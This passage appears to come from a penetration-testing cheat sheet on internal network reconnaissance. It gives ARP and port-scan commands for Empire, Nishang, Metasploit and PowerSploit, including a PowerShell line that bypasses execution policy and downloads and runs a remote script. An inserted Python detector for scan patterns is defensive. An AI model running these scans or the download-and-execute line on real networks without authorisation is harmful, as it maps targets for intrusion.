The arpscan module in Empire:
usemodule situational_awareness/network/arpscan

The Invoke-ARPScan.ps1 script in Nishang:
powershell.exe -exec bypass -Command "& {Import-Module c:\Invoke-ARPScan.ps1;Invoke-ARPScan -CIDR 192.168.1.1/24}" >> c:\log.txt

Via a regular TCP/UDP port scan

The scanline tool:
scanline -h -t 20,80-89,110,389,445,3389,1099,7001,3306,1433,8080,1521 -u 53,161 -O c:\log.txt -p 192.168.1.1-254 /b

Scanning ports within the domain

Scanning with the telnet command:
telnet DC 1433

The S scanner:
s.exe tcp 192.168.1.1 192.168.1.254 445,1433,3389,7001 256 /Banner /save

Metasploit port scan:
use auxiliary/scanner/portscan/tcp

PowerSploit's Invoke-Portscan.ps1 script:
powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/Invoke-Portscan.ps1');Invoke-Portscan -Hosts 192.168.1.1/24 -T 4 -ports '445,3389,1433,8080,7001' -oA c:\log.txt"

Nishang's Invoke-PortScan module:
Invoke-PortScan -StartAddress 192.168.1.1 -EndAddress 192.168.1.254 -ScanPort [-ResolveHost]
(-ResolveHost, optional: probe for live hosts)
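The defender's side of the sweeps above, as an added example that is not part of the original text: a small detector that flags one source reaching many hosts on one port (the shape of a /24 sweep for 445 or 3389) or walking many ports on one host. The log format and sample lines are constructed, and parse_log, detect_scans and the thresholds are assumptions of this example.

```python
from collections import defaultdict

# Constructed sample log, format "<time> <src> <dst> <dport>" (an assumption,
# not a real product's format): one source touching 40 hosts on 445, one
# source walking 12 ports on a single host, and benign traffic.
SAMPLE_LOG = "\n".join(
    [f"2024-01-01T10:00:{i:02d} 192.168.1.50 192.168.1.{i} 445" for i in range(1, 41)]
    + [f"2024-01-01T10:01:{i:02d} 192.168.1.60 192.168.1.10 {p}" for i, p in
       enumerate([20, 80, 81, 82, 110, 389, 445, 1433, 3389, 7001, 8080, 1521])]
    + ["2024-01-01T10:02:00 192.168.1.70 192.168.1.10 445",
       "2024-01-01T10:02:01 192.168.1.70 192.168.1.11 3389"]
)

def parse_log(text):
    """Yield (src, dst, dport); malformed lines are skipped rather than fatal."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4 or not parts[3].isdigit():
            continue
        yield parts[1], parts[2], int(parts[3])

def detect_scans(text, host_threshold=20, port_threshold=10):
    """Return {src: {"sweep": [(port, n_hosts)], "vertical": [(dst, n_ports)]}}.

    sweep: one source reached >= host_threshold distinct hosts on one port
           (the shape of a /24 sweep for 445 or 3389).
    vertical: one source touched >= port_threshold distinct ports on one host.
    Thresholds are tuning assumptions; adjust them to the network's baseline.
    """
    hosts_per_port = defaultdict(lambda: defaultdict(set))  # src -> port -> {dst}
    ports_per_host = defaultdict(lambda: defaultdict(set))  # src -> dst -> {port}
    for src, dst, port in parse_log(text):
        hosts_per_port[src][port].add(dst)
        ports_per_host[src][dst].add(port)
    findings = {}
    for src in hosts_per_port:
        sweep = [(p, len(h)) for p, h in hosts_per_port[src].items()
                 if len(h) >= host_threshold]
        vertical = [(d, len(p)) for d, p in ports_per_host[src].items()
                    if len(p) >= port_threshold]
        if sweep or vertical:
            findings[src] = {"sweep": sorted(sweep), "vertical": sorted(vertical)}
    return findings

if __name__ == "__main__":
    for src, f in detect_scans(SAMPLE_LOG).items():
        print(src, f)
```

The benign source 192.168.1.70 stays below both thresholds and is not reported; raising the thresholds is the usual way to trade false positives against slow, low-volume scans.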
Collecting basic information within the domain

Querying the domain: